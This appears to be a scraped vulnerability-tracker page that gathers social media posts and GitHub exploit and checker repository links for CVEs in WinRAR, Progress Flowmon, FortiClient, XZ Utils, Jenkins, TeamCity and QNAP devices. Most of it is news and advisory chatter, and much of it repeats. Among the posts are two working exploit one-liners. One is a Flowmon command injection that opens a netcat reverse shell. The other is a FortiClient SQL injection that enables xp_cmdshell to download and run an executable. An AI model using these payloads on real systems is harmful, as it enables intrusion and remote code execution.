https://github.com/kehrijksen/CVE-2023-38831
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection
https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc
https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC
https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial
https://github.com/youmulijiang/evil-winrar
https://github.com/IMHarman/CVE-2023-38831
https://github.com/ruycr4ft/CVE-2023-38831
https://github.com/K3rnel-Dev/WinrarExploit
https://github.com/RomainBayle08/CVE-2023-38831
https://github.com/Nielk74/CVE-2023-38831
https://github.com/akhomlyuk/cve-2023-38831
https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE
CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations
By Cluster25 Threat Intel TeamOctober 12, 2023
🔗️ [Duskrise] https://link.is.it/a27zga
##Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.
The Computer Emergency Response Team of Ukraine (CERT-UA) reported an attempted cyberattack against a Defense Forces of Ukraine representative. An unidentified threat actor (tracked as UAC-0149) used Signal messenger to send a malicious RAR archive for a job application. This leveraged the vulnerability CVE-2023-38831 (7.8 high, disclosed 23 August 2023 by Group-IB as an exploited zero-day; RARLAB WinRAR Code Execution Vulnerability). CERT-UA explained that the infection chain leads to COOKBOX malware being deployed. IOC provided. 🔗 https://cert.gov.ua/article/6278620
#threatintel #cyberespionage #CERTUA #Ukraine #RussiaUkraineWar #IOC #UAC0149 #CVE_2023_38831
##CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations
By Cluster25 Threat Intel TeamOctober 12, 2023
🔗️ [Duskrise] https://link.is.it/a27zga
##Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.
The Computer Emergency Response Team of Ukraine (CERT-UA) reported an attempted cyberattack against a Defense Forces of Ukraine representative. An unidentified threat actor (tracked as UAC-0149) used Signal messenger to send a malicious RAR archive for a job application. This leveraged the vulnerability CVE-2023-38831 (7.8 high, disclosed 23 August 2023 by Group-IB as an exploited zero-day; RARLAB WinRAR Code Execution Vulnerability). CERT-UA explained that the infection chain leads to COOKBOX malware being deployed. IOC provided. 🔗 https://cert.gov.ua/article/6278620
#threatintel #cyberespionage #CERTUA #Ukraine #RussiaUkraineWar #IOC #UAC0149 #CVE_2023_38831
##updated 2024-04-04T05:57:40
2 posts
SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##updated 2024-04-04T04:29:06
2 posts
9 repos
https://github.com/sfewer-r7/CVE-2023-34362
https://github.com/kenbuckler/MOVEit-CVE-2023-34362
https://github.com/lithuanian-g/cve-2023-34362-iocs
https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs
https://github.com/Chinyemba-ck/MOVEit-CVE-2023-34362
https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362
https://github.com/horizon3ai/CVE-2023-34362
For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.
##For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.
##updated 2024-04-02T18:31:17
1 posts
Unexpected late security advisory from VMware, but there are 3 vulnerabilities (no mention of exploitation) in VMware SD-WAN Edge and SD-WAN Orchestrator: 🔗 https://www.vmware.com/security/advisories/VMSA-2024-0008.html
#VMware #vulnerability #PatchTuesday #CVE_2024_22246 #CVE_2024_22247 #CVE_2024_22248
##updated 2024-04-02T18:31:17
1 posts
Unexpected late security advisory from VMware, but there are 3 vulnerabilities (no mention of exploitation) in VMware SD-WAN Edge and SD-WAN Orchestrator: 🔗 https://www.vmware.com/security/advisories/VMSA-2024-0008.html
#VMware #vulnerability #PatchTuesday #CVE_2024_22246 #CVE_2024_22247 #CVE_2024_22248
##updated 2024-04-02T18:31:16
1 posts
Unexpected late security advisory from VMware, but there are 3 vulnerabilities (no mention of exploitation) in VMware SD-WAN Edge and SD-WAN Orchestrator: 🔗 https://www.vmware.com/security/advisories/VMSA-2024-0008.html
#VMware #vulnerability #PatchTuesday #CVE_2024_22246 #CVE_2024_22247 #CVE_2024_22248
##updated 2024-04-02T15:30:43
17 posts
25 repos
https://github.com/brijne/CVE-2024-23897-RCE
https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability
https://github.com/viszsec/CVE-2024-23897
https://github.com/binganao/CVE-2024-23897
https://github.com/ThatNotEasy/CVE-2024-23897
https://github.com/h4x0r-dz/CVE-2024-23897
https://github.com/ifconfig-me/CVE-2024-23897
https://github.com/yoryio/CVE-2024-23897
https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897
https://github.com/adhikara13/CVE-2024-2389
https://github.com/CKevens/CVE-2024-23897
https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-
https://github.com/vmtyan/poc-cve-2024-23897
https://github.com/B4CK4TT4CK/CVE-2024-23897
https://github.com/jopraveen/CVE-2024-23897
https://github.com/raheel0x01/CVE-2024-23897
https://github.com/wjlin0/CVE-2024-23897
https://github.com/godylockz/CVE-2024-23897
https://github.com/Nebian/CVE-2024-23897
https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read
https://github.com/xaitax/CVE-2024-23897
https://github.com/kaanatmacaa/CVE-2024-23897
https://github.com/Vozec/CVE-2024-23897
🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi
##@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi
##@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.
(fixed CVE # from a previous post)
https://viz.greynoise.io/tags/progress-flowmon-cve-2024-2389-command-injection-rce-attempt?days=10
##The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/
##PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) https://www.helpnetsecurity.com/2024/04/24/poc-cve-2024-2389/ #networkmonitoring #RhinoSecurity #vulnerability #enterprise #Don'tmiss #Progress #News #PoC
##Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Rhino Labs has published a write-up on the bug here: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
The issue is tracked as CVE-2024-2389.
##Progress Kemp Flowmon CVE-2024-2389:
curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'
🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.
(fixed CVE # from a previous post)
https://viz.greynoise.io/tags/progress-flowmon-cve-2024-2389-command-injection-rce-attempt?days=10
##The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/
##Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Rhino Labs has published a write-up on the bug here: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
The issue is tracked as CVE-2024-2389.
##Progress Kemp Flowmon CVE-2024-2389:
curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'
updated 2024-04-01T16:13:53
2 posts
12 repos
https://github.com/studiogangster/CVE-2023-44487
https://github.com/terrorist/HTTP-2-Rapid-Reset-Client
https://github.com/pabloec20/rapidreset
https://github.com/secengjeff/rapidresetclient
https://github.com/sigridou/CVE-2023-44487-
https://github.com/ReToCode/golang-CVE-2023-44487
https://github.com/nxenon/cve-2023-44487
https://github.com/TYuan0816/cve-2023-44487
https://github.com/bcdannyboy/CVE-2023-44487
https://github.com/imabee101/CVE-2023-44487
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##updated 2024-04-01T15:30:38
1 posts
Grafana erlaubt als ""Feature"" jedem angemeldeten User beliebige SQL Queries abzusetzen.
CVE-2024-3128
https://fdlucifer.github.io/2024/04/22/grafana-sql-injection/
##updated 2024-03-29T18:30:50
8 posts
60 repos
https://github.com/przemoc/xz-backdoor-links
https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container
https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker
https://github.com/bioless/xz_cve-2024-3094_detection
https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check
https://github.com/dah4k/CVE-2024-3094
https://github.com/ScrimForever/CVE-2024-3094
https://github.com/gustavorobertux/CVE-2024-3094
https://github.com/felipecosta09/cve-2024-3094
https://github.com/isuruwa/CVE-2024-3094
https://github.com/mightysai1997/CVE-2024-3094
https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer
https://github.com/bsekercioglu/cve2024-3094-Checker
https://github.com/r0binak/xzk8s
https://github.com/0xlane/xz-cve-2024-3094
https://github.com/brinhosa/CVE-2024-3094-One-Liner
https://github.com/hackingetico21/revisaxzutils
https://github.com/zgimszhd61/cve-2024-3094-detect-tool
https://github.com/neuralinhibitor/xzwhy
https://github.com/Juul/xz-backdoor-scan
https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker
https://github.com/Yuma-Tsushima07/CVE-2024-3094
https://github.com/robertdebock/ansible-role-cve_2024_3094
https://github.com/buluma/ansible-role-cve_2024_3094
https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script
https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
https://github.com/mesutgungor/xz-backdoor-vulnerability
https://github.com/hazemkya/CVE-2024-3094-checker
https://github.com/ashwani95/CVE-2024-3094
https://github.com/CyberGuard-Foundation/CVE-2024-3094
https://github.com/k4t3pr0/Check-CVE-2024-3094
https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check
https://github.com/mightysai1997/CVE-2024-3094-info
https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094
https://github.com/crfearnworks/ansible-CVE-2024-3094
https://github.com/byinarie/CVE-2024-3094-info
https://github.com/Horizon-Software-Development/CVE-2024-3094
https://github.com/reuteras/CVE-2024-3094
https://github.com/jfrog/cve-2024-3094-tools
https://github.com/emirkmo/xz-backdoor-github
https://github.com/iheb2b/CVE-2024-3094-Checker
https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094
https://github.com/ackemed/detectar_cve-2024-3094
https://github.com/Fractal-Tess/CVE-2024-3094
https://github.com/weltregie/liblzma-scan
https://github.com/teyhouse/CVE-2024-3094
https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector
https://github.com/robertdebock/ansible-playbook-cve-2024-3094
https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits
https://github.com/lockness-Ko/xz-vulnerable-honeypot
https://github.com/Mustafa1986/CVE-2024-3094
https://github.com/galacticquest/cve-2024-3094-detect
https://github.com/wgetnz/CVE-2024-3094-check
https://github.com/FabioBaroni/CVE-2024-3094-checker
https://github.com/amlweems/xzbot
https://github.com/krascovict/OSINT---CVE-2024-3094-
https://github.com/badsectorlabs/ludus_xz_backdoor
https://github.com/harekrishnarai/xz-utils-vuln-checker
Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.
Elaastic on CVE-2024-3094 🔗 https://discuss.elastic.co/t/elastic-security-statement-for-cve-2024-3094-xz-versions-5-6-0-and-5-6-1/357894
##On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.
#secure旅団 #secureLiaison XZ UtilsのSWサプライチェーンとOSSエコシステムの話 https://podcasters.spotify.com/pod/show/secure-fm/episodes/XZ-UtilsSWOSS-e2iieds 収録日:2024年4月14日
XZ Utilsにおけるバックドア問題(CVE-2024-3094)を題材に同種の問題をどう防げるかの議論
一通り聴き終えた後、自分の整理のためにポイントをまとめてみました
* 立法観点からのソフトウェア開発のセキュリティ要件の強制: EU Cyber Resilience Act
* コードコミットに対するアカウンタビリティの確保: GitHubが取り組んでいるDID(Decentralized Identity、分散型ID)で将来的に改善しないか?
* バックドアが仕掛けられても、すぐにroot権限が奪取されないようにできないか?: SSH認証が回避されただけでシステム全体の侵害につながる運用実装を何とかできないか(例えば、ユーザからの通信をverifyするなど)。軍事の設計・実装が参考になると思うが、要求レベルが異なる民間で同じように採用できるのか
"The recent attempted XZ Utils backdoor (CVE-2024-3094) may not be an isolated incident as evidenced by a similar credible takeover attempt intercepted by the OpenJS Foundation, home to JavaScript projects used by billions of websites worldwide."
https://openjsf.org/blog/openssf-openjs-alert-social-engineering-takeovers
##Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.
Elaastic on CVE-2024-3094 🔗 https://discuss.elastic.co/t/elastic-security-statement-for-cve-2024-3094-xz-versions-5-6-0-and-5-6-1/357894
##On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.
For those that go crying on social media about an application telling you to curl | bash or even to curl | sudo bash because you're running arbitrary code as root:
That is useless unless you plan to carefully review and audit every line of code that runs on your computer.
Even if you do install said app, do you actually trust it's code ? Do you trust it's dependencies ? What about it's subdependencies ?
There's an infinity of ways to infect an open-source repo with bad code, and some of them are actually scarily easy to perform. Do you trust that your favorite compression utility doesn't contain code that backdoors freaking ssh (https://nvd.nist.gov/vuln/detail/CVE-2024-3094) ? Do you trust that a script won't remove a critical system directory because of a misplaced space (https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123) ? Or that an ubiquitous logging library can allow remote code execution because of a bad default configuration (https://en.m.wikipedia.org/wiki/Log4Shell) ?
I hope I can get this message stuck deep inside your head and let you know that unless you make your own operating system from scratch (including your free bootloader, kernel, gpu driver and the rest), you have to trust somebody. And it only takes one mistake to compromise a whole distribution, or even worse. You have to balance between having a new shiny program and having a new way to get shelled.
##"The recent attempted XZ Utils backdoor (CVE-2024-3094) may not be an isolated incident as evidenced by a similar credible takeover attempt intercepted by the OpenJS Foundation, home to JavaScript projects used by billions of websites worldwide."
https://openjsf.org/blog/openssf-openjs-alert-social-engineering-takeovers
##updated 2024-03-19T09:30:32
4 posts
1 repos
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##CVE-2023-48788 RCE:
echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##CVE-2023-48788 RCE:
echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013
updated 2024-03-14T21:48:10
2 posts
1 repos
Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/
##Jenkins security advisory from 17 April 2024 patched against the Terrapin Attack vulnerability CVE-2023-48795 🔗 https://www.jenkins.io/security/advisory/2024-04-17/
##updated 2024-03-11T15:15:47.663000
2 posts
3 repos
https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-
We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.
##We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.
##updated 2024-03-11T15:15:47.483000
2 posts
9 repos
https://github.com/rampantspark/CVE-2024-27198
https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-
https://github.com/Chocapikk/CVE-2024-27198
https://github.com/passwa11/CVE-2024-27198-RCE
https://github.com/CharonDefalt/CVE-2024-27198-RCE
https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT
https://github.com/yoryio/CVE-2024-27198
We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.
##We posted in March about two authentication-bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, discovered in the web component of the on-premises version of JetBrains’ TeamCity CI/CD server. Our MDR team has noticed a new wrinkle in attacks against TeamCity CVEs, meriting another thread – and your attention.
##updated 2024-03-08T18:30:35
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-08T18:30:35
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-08T18:30:35
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-01T05:06:28
2 posts
4 repos
https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass
https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE
@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
##@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
##updated 2024-02-22T15:30:39
2 posts
2 repos
@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
##@brett and not for the massively exploited zero-day vulnerability that ConnectWise refused to get a CVE ID assigned for this year? CISA had to step in 2 days later to get CVE-2024-1708 and CVE-2024-1709, which by then was getting exploited in the wild. https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
##updated 2024-02-21T18:31:06
4 posts
1 repos
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
